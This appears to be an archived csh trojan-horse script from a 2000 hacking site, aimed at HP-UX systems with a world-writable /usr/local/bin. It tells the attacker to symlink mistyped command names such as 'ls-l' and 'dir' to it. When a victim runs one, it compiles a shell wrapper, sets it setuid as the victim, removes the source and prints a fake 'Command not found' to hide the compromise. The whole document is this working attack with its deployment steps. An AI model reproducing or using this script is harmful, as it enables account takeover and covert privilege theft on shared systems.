- #!/bin/csh
- # This little script file, if named properly and left in the
- # /usr/local/bin directory acts as a pseudo trojan horse on
- # HP-UX systems with world writable /usr/local/bin directories,
- # and /usr/local/bin in all users' paths. This is the default shipping
- # configuration on all recent HP-UX versions (well, on the vanilla A.09.04
- # it is world writable, which is brand new).
- # This script is provided for informational purposes, and will create the
- # file shell.<user> when run.
- #
- # Suggested links (this is in /usr/local/bin):
- #lrwxr-x--- 1 bin bin 2 Feb 28 13:55 dir -> sl
- #lrwxr-x--- 1 bin bin 2 Feb 28 13:33 la -> sl
- #lrwxr-x--- 1 bin bin 2 Feb 28 13:33 ls- -> sl
- #lrwxr-x--- 1 bin bin 2 Feb 28 13:29 ls-al -> sl
- #lrwxr-x--- 1 bin bin 2 Feb 28 13:29 ls-l -> sl
- #lrwxr-x--- 1 bin bin 2 Feb 28 13:29 ls-la -> sl
- #lrwxr-x--- 1 bin bin 2 Feb 28 13:28 setenv -> sl
- #-rwxrwxrwx 1 bin bin 796 Feb 28 14:00 sl
- #
- # note: create this file (sl in above example), then create all the links
- # you want with - "ln -s sl dir", then "chgrp bin dir" and "chown bin dir"
- # and just wait for some unsuspecting user to run the program by mistake.
- cat > /usr/local/bin/bug.c << EOF
- main(argc,argv) int argc; char *argv[]; { execv("/bin/sh",argv); }
- EOF
- cc -o /usr/local/bin/shell.`whoami` /usr/local/bin/bug.c
- rm -f /usr/local/bin/bug.c
- chmod 5777 /usr/local/bin/shell.`whoami`
- echo $0 | awk '{ split($0,cmd,"/"); print cmd[5], ": Command not found." }'
- # www.hack.co.za [2000]#